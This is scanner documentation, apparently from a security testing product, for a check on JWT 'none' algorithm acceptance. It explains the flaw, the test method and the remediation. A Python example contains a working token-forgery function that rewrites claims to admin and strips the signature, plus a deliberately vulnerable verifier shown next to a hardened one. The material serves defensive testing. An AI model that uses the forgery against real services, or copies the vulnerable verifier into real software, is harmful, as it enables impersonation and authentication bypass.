Injection: JWT no algorithm¶
Identifier:
jwt_alg_none
Scanner(s) Support¶
| GraphQL Scanner | REST Scanner | WebApp Scanner | ASM Scanner |
|---|---|---|---|
Description¶
JWT 'none' algorithm vulnerabilities occur when a server trusts the `alg` field in the token header and accepts a token marked `alg: none` as valid even though it carries no signature. An attacker who holds any token, or who can construct one, can then rewrite the claims, drop the signature and impersonate any user, because no signature validation ever takes place. The fix is to pin the accepted algorithm(s) in server-side configuration and ignore the algorithm the token declares; rejecting only the exact string 'none' is not enough, since some implementations have accepted case variants such as 'None' or 'NONE'.
How we test: We take a JWT from an authenticated exchange, rewrite its header to use the 'none' algorithm, strip the signature (leaving the trailing dot), and replay the request. We then compare the response with the authenticated baseline to detect whether the server accepts the unsigned token. A server passes when it rejects tokens declaring the 'none' algorithm, or enforces signature validation regardless of the declared algorithm.
Execution conditions (BLST):
- Runs when this sub-test is enabled and a suitable authenticated JWT exchange is found by the shared JWT baseline selection logic.
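The forgery described above, next to a verifier that falls for it and one that does not. This is an added illustration, not the scanner's own code: it uses only the Python standard library, the secret and the claims are constructed for the example, and `vulnerable_verify` / `hardened_verify` are hypothetical server-side functions standing in for a real application's JWT handling.

```python
import base64
import hashlib
import hmac
import json

# Constructed for this example; a real server keeps its key in a secret store.
SECRET = b"constructed-demo-secret"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a legitimate HS256 token (what the server hands out)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def forge_alg_none(token: str, new_claims: dict, alg_value: str = "none") -> str:
    """The attack step: set alg to 'none' (or a case variant), swap the claims,
    and drop the signature while keeping the trailing dot so the token still
    has three segments."""
    header = json.loads(b64url_decode(token.split(".")[0]))
    header["alg"] = alg_value
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(new_claims, separators=(",", ":")).encode())
    return f"{h}.{p}."


def vulnerable_verify(token: str, secret: bytes):
    """Hypothetical vulnerable server: dispatches on the alg the token declares,
    so an unsigned 'none' token is accepted and its claims trusted."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))          # no signature check at all
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def hardened_verify(token: str, secret: bytes, allowed_algs=("HS256",)):
    """Hypothetical fixed server: the accepted algorithm is pinned server-side,
    'none' in any casing is rejected, and a missing signature fails closed."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None                                  # malformed or unsigned
    h, p, s = parts
    alg = json.loads(b64url_decode(h)).get("alg")
    if not isinstance(alg, str) or alg.lower() == "none" or alg not in allowed_algs:
        return None                                  # never trust the header's alg
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    legit = sign_hs256({"sub": "alice", "role": "user"}, SECRET)
    forged = forge_alg_none(legit, {"sub": "admin", "role": "admin"})
    print("vulnerable server accepts forged token:", vulnerable_verify(forged, SECRET) is not None)
    print("hardened server accepts forged token:  ", hardened_verify(forged, SECRET) is not None)
```

The scanner's check is the same comparison as the two `print` lines: a forged `alg: none` token that yields the same response as the authenticated baseline means the server behaves like `vulnerable_verify`. When remediating, prefer a library call that takes an explicit list of allowed algorithms over any code path that reads `alg` from the token.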
Configuration¶
Example¶
Example configuration:
Reference¶
skip¶
Type: boolean
Skip the test if true.